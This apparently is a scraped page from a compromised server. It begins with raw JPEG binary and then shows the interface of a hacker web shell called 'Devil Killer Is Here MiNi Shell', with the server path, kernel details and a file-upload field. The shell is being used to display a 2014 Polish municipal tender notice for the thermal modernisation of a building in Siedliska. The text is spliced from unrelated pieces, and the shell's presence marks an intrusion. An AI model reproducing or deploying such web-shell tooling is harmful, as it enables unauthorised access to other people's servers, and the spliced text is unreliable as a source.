JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140210/45686-N-2014.html

<p class="kh_header"><b>Tuchów: Termomodernizacja budynku wielofunkcyjnego w Siedliskach</b><br>
<b>Numer ogłoszenia: 45686 - 2014; data zamieszczenia: 10.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku wielofunkcyjnego w Siedliskach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z termomodernizacją obiektu wielofunkcyjnego (docieplenie przegród zewnętrznych, wymiana instalacji c.o.) zlokalizowanego na działce nr 804 w Siedliskach
Zakres  robót  obejmuje  termomodernizację  budynku wielofunkcyjnego w Siedliskach w zakresie:            
Remont  kapitalny  elewacji  budynku  polega  będzie  na  wykuciu  drzwi  wejściowych od  strony  zewnętrznej, wykuciu istniejących parapetów  okiennych, haków  i  krat  stalowych  okiennych, zdemontowaniu  rur  spustowych, zdemontowaniu  daszków  nad  wejściami do  budynku  od  strony  wschodniej, południowej   i zachodniej, rozebraniu  chodnika  z  kostki betonowej i płytek chodnikowych, rozebraniu  opaski  i  chodnika  z  betonu  i  z  płytek  chodnikowych 50*50 cm, odkopaniu  ścian  czci podpiwniczonej  budynku, dociepleniu  cian  czci  podpiwniczonej  płytami  polistyrenowymi  grubości  9  cm, wykonaniu  izolacji czci  podpiwniczonej  pap  termozgrzewalnej  i  izolacji  pionowej   budynku  foli  kubełkowy, zamontowaniu  nowych  drzwi atestowanych  do  kotłowni, zamontowaniu drzwi wejściowych aluminiowych do budynku, zamontowaniu bram garażowych podnoszonych mechanicznie, wykonaniu schodów i podestu wejściowego do pomieszczeń PSP od strony zachodniej, zdemontowaniu i powtórnym zamontowaniu konstrukcji schodów wejściowych do pomieszczeń TP S.A. od strony zachodniej, wykonaniu  rusztowania  zewnętrznego, wykonaniu ocieplenia  budynku  styropianem  grubości  12  cm, wykonaniu  nowych  szlachetnych  tynków  elewacyjnych, zamontowaniu  nowej - pozostałej nie wymienionej stolarki  okiennej  PCV  od  strony  wschodniej, południowej, zachodniej - szt. 22 wykonaniu  daszków  z poliwęglanu nad wejściami do budynku,  zamontowaniu nowych  rur  spustowych i rynien dachowych, obłożeniu  cokoła  obiektu  tynkiem  mozaikowym, wykonaniu podbudowy i  ułożeniu  chodnika z  kostki  betonowej, wykonanie  drenażu  zewnętrznego z  rur  perforowanych  PCV, wymianie  czci kanalizacji  sanitarnej  i  deszczowej,  wykonaniu  podestu  i  schodów  wejściowych  do  kotłowni  z  kostki  betonowej, zdemontowaniu rusztowania  zewnętrznego, pomalowaniu  rur  gazowych, zamontowaniu  nowych  skrzynek  gazowych, wywiezieniu  gruzu  z  rozbiórki.
Natomiast wymiana instalacji c.o. z wykonaniem kotłowni gazowej polegać będzie na wykonaniu instalacji gazowej z wymianą pieca gazowego oraz kuchenek gazowych i taboretu gazowego, wykonanie instalacji elektrycznej (gniazda wtykowe oraz zasilanie czujnika temperatury zewnętrznej i termostatu pokojowego), obłożenie ścian kotłowni płytkami ceramicznymi, a także pomalowaniu ścian kotłowni z przygotowaniem ścian pod malowanie (gruntowanie oraz poszpachlowaniem  nierówności tynku.
Ogólny zakres robót robót budowlanych:
a/ w  zakresie robót ogólnobudowlanych:

-wykucie  drzwi  wejściowych  od  strony  zewnętrznej, 
-wykucie  parapetów  okiennych, haków  i  krat  stalowych  okiennych,
-zdemontowanie  rur  spustowych, 
-zdemontowanie daszków nad wejściami do budynku od strony wschodniej południowej i zachodniej, 
-rozebranie  chodnika  z  kostki betonowej, 
-rozebranie  opaski  i  chodnika  z  betonu i  z  płytek  chodnikowych 50*50 cm, 
-odkopanie  ścian  fundamentowych  i  ścian  części  podpiwniczonej  budynku, -docieplenie  ścian  fundamentowych  płytami  polistyrenowymi (styrodurem) grubości 9 cm, 
-wykonanie  izolacji  pionowej   budynku  folią  kubełkową, 
-zamontowanie  nowych  drzwi atestowanych  do  kotłowni, 
-zamontowanie nowych drzwi wejściowych aluminiowych do budynku,
-wykonanie  rusztowania  zewnętrznego, 
-wykonanie  ocieplenia  budynku  styropianem  grubości  12  cm, 
-wykonanie  nowych  szlachetnych  tynków  elewacyjnych, 
-zamontowanie  nowej  stolarki  okiennej  PCV - szt. 22
-zamontowanie  nowego  pokrycia  i  podbitki  daszku  od  strony  zachodniej, 
-zamontowanie rur  spustowych i rynien  nad  wejściem   do  budynku  od  strony  zachodniej, 
-obłożenie  cokoła  obiektu  tynkiem  mozaikowym, 
-zamontowanie  zdemontowanych  rur  spustowych,
-przebudowie  częściowego  odwodnienia  budynku,
-wykonanie  drenażu  zewnętrznego,
-wykonanie  nowej  zewnętrznej instalacji kanalizacji  sanitarnej,
-wykonanie  podbudowy  i  ułożeniu  chodnika  z  kostki  betonowej, 
-wykonanie  podestu i schodów  wejściowych  ażurowych ze stali ocynkowanej pomalowanej proszkowo do pomieszczeń PSP od strony zachodniej,
-wykonanie daszków nad wejściami do budynku z poliwęglanu,
-zdemontowanie  rusztowania  zewnętrznego, 
-pomalowanie  rur  gazowych, 
-montażu bram garażowych,
-zamontowanie  nowych  skrzynek  gazowych, 
-wywiezienie  gruzu  z  rozbiórki.
b/ w  zakresie robót instalacyjnych:

-wymiana instalacji c.o. z wykonaniem kotłowni gazowej
-wykonanie instalacji gazowej z wymianą pieca gazowego oraz kuchenek gazowych i taboretu gazowego
-wykonanie instalacji elektrycznej ( gniazda wtykowe oraz zasilanie czujnika temperatury zewnętrznej i termostatu pokojowego)
-obłożenie ścian kotłowni płytkami ceramicznymi
-malowanie ścian kotłowni z przygotowaniem ścian pod malowanie (gruntowanie oraz poszpachlowaniem  nierówności tynku

Opis przedmiotu zamówienia zawarto w szczegółowym opisie przedmiotu zamówienia (załącznik 1a do SIWZ), dokumentacji projektowej (załącznik 1b do SIWZ), specyfikacji technicznej wykonania i odbioru robót (załącznik 1c do SIWZ) oraz przedmiarze robót (załącznik nr 1d do SIWZ). Wykonawca może dokonać wizji lokalnej terenu robót w dniach od poniedziałku do piątku w godz. 9:00 - 12:00 po wcześniejszym telefonicznym uzgodnieniu z osobą do spraw merytorycznych wymienioną w pkt VIII.6 SIWZ.

Nomenklatura CPV: 
roboty  rozbiórkowe i wyburzeniowe -  Kod  CPV 45111100-9,
Kod  CPV 45111220-6 
balustrady, poręcze -  kod  Kod  CPV 45421160-3 
elewacja - roboty  renowacyjne - Kod  CPV  45453100-8 
rusztowania  zewnętrzne - Kod  CPV 45262110-5, Kod  CPV 45262120-8 
montaż stolarki okiennej - Kod  CPV 4542100-5 
ślusarka drzwiowa - Kod  CPV 45421110-8 
izolacja pionowa ścian części podpiwniczonej - Kod  CPV 45320000-6 
chodniki, opaska  i odwodnienie budynku - Kod  CPV 45233222-1, 
Kod  CPV 45232410-9 
instalacja odgromowa - Kod  CPV 45312311-0  
daszki  nad  wejściami do budynku - Kod  CPV 45261213-0,  Kod  CPV 45261000 
tynki kominów ponad dachem - Kod  CPV 45443000-4 
remont pokrycia dachowego - Kod  CPV 45261210-9 
wywóz ziemi i gruzu - Kod  CPV 45111220-6 
docieplenie stropu nad najwyższą kondygnacją  - Kod  CPV 45320000-6 
roboty  różne wykończeniowe - Kod  CPV 45400000-1 
roboty instalacyjne wodno-kanalizacyjne i sanitarne - Kod  CPV 45330000-9 
roboty w zakresie okablowania oraz instalacji elektrycznych - Kod  CPV 45311000-0 
roboty budowlane - KOD CPV 45215500-2
roboty instalacyjne - KOD CPV 45330000-0
roboty elektryczne -  KOD CPV 45310000-3.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium o wartości 5.000 zł.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1. pieniądzu,
2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3. gwarancjach bankowych,
4. gwarancjach ubezpieczeniowych,
5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U nr 109, poz. 1158 z późn. zm.). 
3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Bieczu 
- Filia Tuchów Nr 75 8627 0001 2023 9000 2645 0004.
4. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia i godziny wskazanych w pkt. XII.1.
5. Należy dołączyć potwierdzenie wykonania przelewu do oferty.
6. Wadium wnoszone w innej formie niż pieniądz należy złożyć w postaci oryginału dokumentu w pokoju nr 7, Biuro Obsługi Klienta - RATUSZ przed terminem składania ofert. Nie należy załączać oryginału dokumentu wadialnego do oferty. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy.
7. Do oferty należy dołączyć kopię dokumentu potwierdzającego wniesienie wadium, potwierdzoną za zgodność z oryginałem. 
8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 14.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
11. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 9, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
13. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie. 
Ocena tego warunku zostanie dokonana na podstawie:
oświadczenia stanowiącego załącznik nr 3 do SWIZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca wykazał się co najmniej 2 robotami remontowo-budowlanymi wykonywanymi w obiektach użyteczności publicznej o wartości nie mniejszej niż 300.000,00 PLN brutto każda, polegającymi miedzy innymi na termomodernizacji budynku i wymianie instalacji c.o. w obiekcie.
Ocena tego warunku zostanie dokonana na podstawie:
oświadczenia stanowiącego załącznik nr 3 do SWIZ; 
Wykazu robót, stanowiącego załącznik nr 4 do SWIZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie i nie żąda dokumentów potwierdzających spełnienie tego warunku. Ocena tego warunku zostanie dokonana na podstawie oświadczenia stanowiącego załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował:
1. kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej z minimum 3-letnim doświadczeniem zawodowym jako kierownik budowy w tym doświadczeniem w zakresie kierowania budową lub przebudową lub remontem przynajmniej jednego obiektu użyteczności publicznej,
2. kierownikiem robót elektrycznych posiadającym uprawnienia budowlane w specjalności instalacje elektryczne z minimum 3-letnim doświadczeniem zawodowym jako kierownik budowy lub robót.
3. kierownikiem robót sanitarnych posiadającym uprawnienia budowlane w specjalności instalacje sanitarne i gazowe z minimum 3-letnim doświadczeniem zawodowym jako kierownik budowy lub robót.

Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394). 
Ocena tego warunku zostanie dokonana na podstawie:
oświadczenia stanowiącego załącznik nr 3 do SWIZ;
Wykazu osób, stanowiącego załącznik nr 5 do SIWZ;
oświadczenia Wykonawcy, że osoby, które będą uczestniczyć                            w wykonywaniu zamówienia, posiadają wymagane ustawą uprawnienia, stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 400 000 PLN. 
Ocena tego warunku zostanie dokonana na podstawie:
oświadczenia stanowiącego załącznik nr 3 do SWIZ;
opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór obowiązującej umowy przedstawiony jest w załączniku nr 9 do SIWZ.
